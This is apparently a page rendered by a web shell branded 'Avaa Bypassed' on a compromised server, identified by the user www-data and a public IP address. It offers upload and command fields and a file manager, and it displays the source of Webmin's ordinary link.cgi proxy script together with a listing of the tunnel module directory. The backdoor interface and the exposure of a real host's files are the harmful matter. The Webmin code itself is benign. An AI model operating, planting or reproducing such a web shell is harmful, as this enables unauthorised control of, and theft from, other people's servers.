[ Avaa Bypassed ]

Upload:

Command:

www-data@3.17.145.236: ~ $ 
#!/usr/bin/perl
# link.cgi
# Forward the URL from path_info on to another webmin server

use strict;
use warnings;
no warnings 'redefine';
no warnings 'uninitialized';
our (%config, %text, %module_info, %in, %gconfig, $module_name);
require './tunnel-lib.pl';

$ENV{'PATH_INFO'} =~ /^\/(http|https):\/+([^:\/]+)(:(\d+))?(.*)$/ ||
	&error("Bad PATH_INFO : ".&html_escape($ENV{'PATH_INFO'}));
my $protocol = $1;
my $ssl = $protocol eq "https";
my $host = $2;
my $port = $4 || ( !$ssl ? 80 : 443 );
my $path = $5 || "/";
my $openurl = "$1://$2$3$5";
my $baseurl = "$1://$2$3";
if ($ENV{'QUERY_STRING'}) {
	$path .= '?'.$ENV{'QUERY_STRING'};
	}
elsif (@ARGV) {
	$path .= '?'.join('+', @ARGV);
	}
my $linkurl = &get_webprefix()."/$module_name/link.cgi/";
my $url = &get_webprefix()."/$module_name/link.cgi/$openurl";
$| = 1;
my $meth = $ENV{'REQUEST_METHOD'};
if ($config{'url'}) {
	$openurl = &fix_end_url($config{'url'}) || &error($text{'seturl_eurl'});
	}

my ($user, $pass);
if ($config{'loginmode'} == 2) {
	# Login is variable .. check if we have it yet
	if ($ENV{'HTTP_COOKIE'} =~ /tunnel=([^\s;]+)/) {
		# Yes - set the login and password to use
		($user, $pass) = split(/:/, &decode_base64("$1"));
		}
	else {
		# No - need to display a login form
		&ui_print_header(undef, $text{'login_title'}, "");

		print "<center>\n";
		print &text('login_desc', "<tt>$openurl</tt>"),"<p>\n";

		print &ui_form_start("/$module_name/login.cgi", "post");
		print &ui_hidden("url", $openurl);
		print &ui_table_start($text{'login_header'}, undef, 2);
		print &ui_table_row($text{'login_user'},
			&ui_textbox("user", undef, 20));
		print &ui_table_row($text{'login_pass'},
			&ui_password("pass", undef, 20));
		print &ui_table_end();
		print &ui_form_end([ [ undef, $text{'login_login'} ] ]);

		print "</center>\n";

		&ui_print_footer("", $text{'index_return'});
		exit;
		}
	}
elsif ($config{'loginmode'} == 1) {
	# Login is fixed
	$user = $config{'user'};
	$pass = $config{'pass'};
	}

# Connect to the server
my $con = &make_http_connection($host, $port, $ssl, $meth, $path);
&error($con) if (!ref($con));

# Send request headers
&write_http_connection($con, "Host: $host\r\n");
&write_http_connection($con, "User-Agent: Webmin\r\n");
if ($user) {
	my $auth = &encode_base64("$user:$pass");
	$auth =~ s/\n//g;
	&write_http_connection($con, "Authorization: basic $auth\r\n");
	}
&write_http_connection($con, sprintf(
			"Webmin-servers: %s://%s:%d/$module_name/\r\n",
			$ENV{'HTTPS'} eq "ON" ? "https" : "http",
			$ENV{'SERVER_NAME'}, $ENV{'SERVER_PORT'}));
my $cl = $ENV{'CONTENT_LENGTH'};
&write_http_connection($con, "Content-Length: $cl\r\n") if ($cl);
&write_http_connection($con, "Content-Type: $ENV{'CONTENT_TYPE'}\r\n")
	if ($ENV{'CONTENT_TYPE'});
&write_http_connection($con, "\r\n");
if ($cl) {
	my $post;
	&read_fully(\*STDIN, \$post, $cl);
	&write_http_connection($con, $post);
	}

# read back the headers
my $dummy = &read_http_connection($con);
my ($headers, %header);
while(1) {
	my $headline;
	($headline = &read_http_connection($con)) =~ s/\r|\n//g;
	last if (!$headline);
	$headline =~ /^(\S+):\s+(.*)$/ || &error("Bad header");
	$header{lc($1)} = $2;
	$headers .= $headline."\n";
	}

my $defport = $ssl ? 443 : 80;
if ($header{'location'}) {
	# fix a redirect
	&redirect("/$module_name/link.cgi/$header{'location'}");
	exit;
	}
if ($header{'location'} =~ /^(http|https):\/\/$host:$port$path(.*)$/ ||
    $header{'location'} =~ /^(http|https):\/\/$host$path(.*)/ &&
    $port == $defport) {
	# fix a redirect
	&redirect("$url/$2");
	exit;
	}
elsif ($header{'www-authenticate'}) {
	# Invalid login
	if ($config{'loginmode'} == 2) {
		print "Set-Cookie: tunnel=; path=/\n";
		&error(&text('link_eautologin', "<tt>$openurl</tt>",
		     "/$module_name/link.cgi/$path"));
		}
	elsif ($user) {
		&error(&text('link_elogin', $host, $user)." ".
		       &text('link_mconfig',
			"@{[&get_webprefix()]}/config.cgi?$module_name"));
		}
	else {
		&error(&text('link_enouser', $host)." ".
		       &text('link_mconfig',
			"@{[&get_webprefix()]}/config.cgi?$module_name"));
		}
	}
else {
	# just output the headers
	print $headers,"\n";
	}

# read back the rest of the page
if ($header{'content-type'} =~ /text\/html/ && !$header{'x-no-links'}) {
	while($_ = &read_http_connection($con)) {
		# fix protocol relative src like <iframe src='//foo.com' />
		s/src='(\/\/[^']*)'/src='$protocol:$1'/gi;
		s/src="(\/\/[^"]*)"/src="$protocol:$1"/gi;
		s/src=(\/\/[^ "'>]*)/src=$protocol:$1/gi;

		# Fix protocol relative hrefs like <a href=//foo.com/foo.html>
		s/href='(\/\/[^']*)'/href='$protocol:$1'/gi;
		s/href="(\/\/[^"]*)"/href="$protocol:$1"/gi;
		s/href=(\/\/[^ "'>]*)/href=$protocol:$1/gi;

		# Fix protocol relative form actions like <form action=//foo.com>
		s/action='(\/\/[^']*)'/action='$protocol:$1'/gi;
		s/action="(\/\/[^"]*)"/action="$protocol:$1"/gi;
		s/action=(\/\/[^ "'>]*)/action=$protocol:$1/gi;

		# Fix absolute image links like <img src=/foo.gif>
		s/src='(\/[^']*)'/src='$baseurl$1'/gi;
		s/src="(\/[^"]*)"/src="$baseurl$1"/gi;
		s/src=(\/[^ "'>]*)/src=$baseurl$1/gi;

		# Fix offsite image links <img src=http://www.blah.com/foo.gif>
		s/src='((http|https):\/\/[^']*)'/src='$linkurl$1'/gi;
		s/src="((http|https):\/\/[^"]*)"/src="$linkurl$1"/gi;
		s/src=((http|https):\/\/[^ "'>]*)/src=$linkurl$1/gi;

		# Fix absolute hrefs like <a href=/foo.html>
		s/href='(\/[^']*)'/href='$baseurl$1'/gi;
		s/href="(\/[^"]*)"/href="$baseurl$1"/gi;
		s/href=(\/[^ "'>]*)/href=$baseurl$1/gi;

		# Fix offsite hrefs like <a href=http://www.blah.com/>
		s/href='((http|https):\/\/[^']*)'/href='$linkurl$1'/gi;
		s/href="((http|https):\/\/[^"]*)"/href="$linkurl$1"/gi;
		s/href=((http|https):\/\/[^ "'>]*)/href=$linkurl$1/gi;

		# Fix absolute form actions like <form action=/foo>
		s/action='(\/[^']*)'/action='$baseurl$1'/gi;
		s/action="(\/[^"]*)"/action="$baseurl$1"/gi;
		s/action=(\/[^ "'>]*)/action=$baseurl$1/gi;

		# Fix offsite form actions
		s/action='((http|https):\/\/[^']*)'/action='$linkurl$1'/gi;
		s/action="((http|https):\/\/[^"]*)"/action="$linkurl$1"/gi;
		s/action=((http|https):\/\/[^ "'>]*)/action=$linkurl$1/gi;

		#s/\.location\s*=\s*'$path([^']*)'/.location='$url\/$1'/gi;
		#s/\.location\s*=\s*"$path([^']*)"/.location="$url\/$1"/gi;
		#s/window.open\("$path([^"]*)"/window.open\("$url\/$1"/gi;
		#s/name=return\s+value="$path([^"]*)"/name=return value="$url\/$1"/gi;
		print;
		}
	}
else {
	while(my $buf = &read_http_connection($con,1024)) {
		print $buf;
		}
	}
&close_http_connection($con);

Filemanager

DIR : / usr/ share/ webmin/ tunnel/
Name Type Size Permission Actions
images Folder 0755
lang Folder 0755
CHANGELOG File 124 B 0644
config File 12 B 0644
config.info File 188 B 0644
config.info.ca File 199 B 0644
config.info.de File 210 B 0644
config.info.es File 225 B 0644
config.info.fr File 259 B 0644
config.info.hu File 0 B 0644
config.info.it File 206 B 0644
config.info.ko File 216 B 0644
config.info.ms File 243 B 0644
config.info.nl File 223 B 0644
config.info.no File 200 B 0644
index.cgi File 698 B 0755
link.cgi File 6.38 KB 0755
login.cgi File 539 B 0755
module.info File 137 B 0644
module.info.af File 0 B 0644
module.info.af.auto File 120 B 0644
module.info.ar File 0 B 0644
module.info.ar.auto File 117 B 0644
module.info.be File 0 B 0644
module.info.be.auto File 174 B 0644
module.info.bg File 0 B 0644
module.info.bg.auto File 159 B 0644
module.info.ca File 113 B 0644
module.info.ca.auto File 15 B 0644
module.info.cs File 19 B 0644
module.info.cs.auto File 98 B 0644
module.info.da File 0 B 0644
module.info.da.auto File 128 B 0644
module.info.de File 130 B 0644
module.info.de.auto File 15 B 0644
module.info.el File 0 B 0644
module.info.el.auto File 198 B 0644
module.info.es File 20 B 0644
module.info.es.auto File 113 B 0644
module.info.eu File 0 B 0644
module.info.eu.auto File 123 B 0644
module.info.fa File 0 B 0644
module.info.fa.auto File 160 B 0644
module.info.fi File 0 B 0644
module.info.fi.auto File 125 B 0644
module.info.fr File 0 B 0644
module.info.fr.auto File 124 B 0644
module.info.he File 0 B 0644
module.info.he.auto File 127 B 0644
module.info.hr File 0 B 0644
module.info.hr.auto File 117 B 0644
module.info.hu File 138 B 0644
module.info.hu.auto File 16 B 0644
module.info.it File 20 B 0644
module.info.it.auto File 109 B 0644
module.info.ja File 0 B 0644
module.info.ja.auto File 153 B 0644
module.info.ko File 20 B 0644
module.info.ko.auto File 110 B 0644
module.info.lt File 0 B 0644
module.info.lt.auto File 121 B 0644
module.info.lv File 0 B 0644
module.info.lv.auto File 141 B 0644
module.info.ms File 90 B 0644
module.info.ms.auto File 17 B 0644
module.info.mt File 0 B 0644
module.info.mt.auto File 117 B 0644
module.info.nl File 20 B 0644
module.info.nl.auto File 107 B 0644
module.info.no File 20 B 0644
module.info.no.auto File 97 B 0644
module.info.pl File 0 B 0644
module.info.pl.auto File 127 B 0644
module.info.pt File 0 B 0644
module.info.pt.auto File 131 B 0644
module.info.pt_BR File 0 B 0644
module.info.pt_BR.auto File 140 B 0644
module.info.ro File 0 B 0644
module.info.ro.auto File 134 B 0644
module.info.ru File 0 B 0644
module.info.ru.auto File 190 B 0644
module.info.sk File 0 B 0644
module.info.sk.auto File 114 B 0644
module.info.sl File 0 B 0644
module.info.sl.auto File 122 B 0644
module.info.sv File 0 B 0644
module.info.sv.auto File 114 B 0644
module.info.th File 0 B 0644
module.info.th.auto File 244 B 0644
module.info.tr File 0 B 0644
module.info.tr.auto File 136 B 0644
module.info.uk File 0 B 0644
module.info.uk.auto File 178 B 0644
module.info.ur File 0 B 0644
module.info.ur.auto File 165 B 0644
module.info.vi File 0 B 0644
module.info.vi.auto File 168 B 0644
module.info.zh File 0 B 0644
module.info.zh.auto File 114 B 0644
module.info.zh_TW File 0 B 0644
module.info.zh_TW.auto File 123 B 0644
seturl.cgi File 418 B 0755
tunnel-lib.pl File 654 B 0755

© 2025 Coded By Avaa Code.